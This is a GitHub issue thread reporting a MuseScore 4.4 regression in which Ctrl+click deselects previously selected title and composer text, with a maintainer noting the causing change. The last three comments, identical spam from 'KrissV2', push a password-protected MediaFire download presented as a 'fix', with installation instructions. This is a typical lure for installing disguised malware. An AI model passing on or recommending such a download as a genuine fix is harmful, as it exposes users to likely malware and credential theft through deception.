### ISSUE TITLE
Holding down the Ctrl key + click deselects each previous text in vertical and horizontal frames. 

### ISSUE THREAD

**Issue by cadiz2** [musescore/MuseScore#24312]
### Issue type

UX/Interaction bug (incorrect behaviour)

### Description with steps to reproduce

1. Open the Jazz Lead Sheet template
(Your aim is to remove the title, subtitle and composer)

2. Press and hold the Ctrl key (I am running Windows10) and click on each text.

3.  As you can see from the first part of the GIF (made with 4.3.2), the behavior is as expected. But not with version 4.4 (second part of the GIF) as each click deselects the previous text. 

### Supporting files, videos and screenshots

![Video cadres](https://github.com/user-attachments/assets/72913fa4-b017-4431-ad4a-09beaaa48e20)

### What is the latest version of MuseScore Studio where this issue is present?

4.4

### Regression

Yes, this used to work in a previous version of MuseScore 4.x, ie 4.3.2

### Operating system

Windows 10

### Additional context

I guess it's the same unexpected behaviour with Cmd/Mac ? 

### Checklist

- [X] This report follows the [guidelines](https://github.com/musescore/MuseScore/wiki/Reporting-bugs-and-issues) for reporting bugs and issues
- [X] I have verified that this issue has not been logged before, by searching the [issue tracker](https://github.com/musescore/MuseScore/issues) for similar issues
- [X] I have attached all requested files and information to this report
- [X] I have attempted to identify the root problem as concisely as possible, and have used minimal reproducible examples where possible

**Comment by mathesoncalum** [comment]
Introduced with #21438, investigating now...

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
